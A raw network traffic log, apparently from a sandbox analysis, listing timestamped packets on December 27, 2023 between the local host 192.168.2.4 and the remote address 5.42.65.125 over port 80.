Dec 27, 2023 18:12:25.532795906 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.532823086 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.533030033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.533056021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.533063889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.533106089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.533121109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.533128023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.533134937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.533148050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.533158064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.533179045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.533207893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.533242941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.533340931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.533348083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.533354044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.533360958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.533366919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.533375025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.533379078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.533386946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.533399105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.533406019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.533411026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.533412933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.533420086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.533420086 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.533428907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.533440113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.533457041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.533463955 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.533463955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.533498049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.533807039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.533816099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.533849955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.533854961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.533911943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.533919096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.533926010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.533932924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.533940077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.533946991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.533948898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.533953905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.533977032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.533994913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.534023046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.534032106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.534043074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.534049988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.534058094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.534069061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.534069061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.534075975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.534085989 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.534097910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.534105062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.534116030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.534122944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.534136057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.534156084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.534162045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.534166098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.534188986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.534195900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.534198999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.534231901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.534245968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.534254074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.534265995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.534272909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.534291029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.534307003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.534807920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.534815073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.534826994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.534833908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.534841061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.534857035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.534877062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.534883976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.534914017 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.534970999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.534980059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.535016060 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.535039902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.535047054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.535059929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.535068989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.535084009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.535104036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.535156965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.535187960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.535223007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.535231113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.535268068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.535281897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.535294056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.535305977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.535312891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.535320044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.535332918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.535348892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.535360098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.535571098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.535578966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.535614967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.535619020 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.535623074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.535635948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.535657883 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.535676003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.535696030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.535706997 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.535777092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.535815001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.535855055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.535906076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.535912991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.535924911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.535932064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.535939932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.535952091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.535954952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.535970926 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.536000013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536007881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536019087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536026001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536031961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536042929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536051989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536051989 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.536070108 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.536089897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536092043 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.536190987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536199093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536210060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536216974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536228895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536236048 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.536258936 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.536268950 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.536475897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536550045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536591053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536598921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536634922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.536684990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536693096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536700010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536706924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536732912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.536746979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.536798954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536807060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536813974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536819935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536827087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536833048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536839008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536843061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.536854982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536861897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536869049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536874056 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.536887884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536894083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536892891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.536904097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.536906958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536915064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.536931038 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.536958933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.537234068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.537241936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.537277937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.537308931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.537314892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.537327051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.537332058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.537337065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.537344933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.537352085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.537358046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.537369967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.537395954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.537419081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.537425041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.537436008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.537441969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.537458897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.537489891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.537497044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.537507057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.537513971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.537528038 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.537615061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.537621975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.537631989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.537637949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.537642956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.537650108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.537652969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.537656069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.537662029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.537679911 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.537683010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.537693024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.537738085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.537763119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.537772894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.537796974 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.538240910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.538249016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.538278103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.538350105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.538449049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.538455009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.538465023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.538471937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.538477898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.538489103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.538489103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.538496017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.538515091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.538527966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.538568974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.538575888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.538582087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.538587093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.538593054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.538599968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.538604975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.538605928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.538613081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.538618088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.538620949 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.538624048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.538640976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.538640976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.538647890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.538657904 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.538683891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.539006948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.539051056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.539063931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.539071083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.539077997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.539094925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.539119005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.539120913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.539155006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.539186954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.539223909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.539232016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.539263010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.539268970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.539297104 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.539302111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.539321899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.539329052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.539360046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.539362907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.539386034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.539392948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.539402962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.539432049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.539532900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.539540052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.539551973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.539558887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.539565086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.539578915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.539581060 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.539586067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.539597034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.539598942 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.539603949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.539613008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.539616108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.539623022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.539634943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.539642096 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.539675951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.539959908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.540106058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.540112972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.540123940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.540131092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.540143013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.540148020 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.540149927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.540158033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.540174961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.540190935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.540200949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.540208101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.540218115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.540225029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.540231943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.540240049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.540242910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.540251017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.540261984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.540266991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.540288925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.540324926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.540332079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.540344000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.540349960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.540357113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.540368080 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.540369034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.540390968 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.540406942 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.540764093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.540771961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.540779114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.540786028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.540792942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.540800095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.540831089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.540967941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.540975094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.540982008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.540987968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.540993929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.540999889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.541002989 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.541007042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.541017056 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.541019917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.541027069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.541032076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.541038990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.541047096 CET	80	49738	5.42.65.125	192.168.2.4
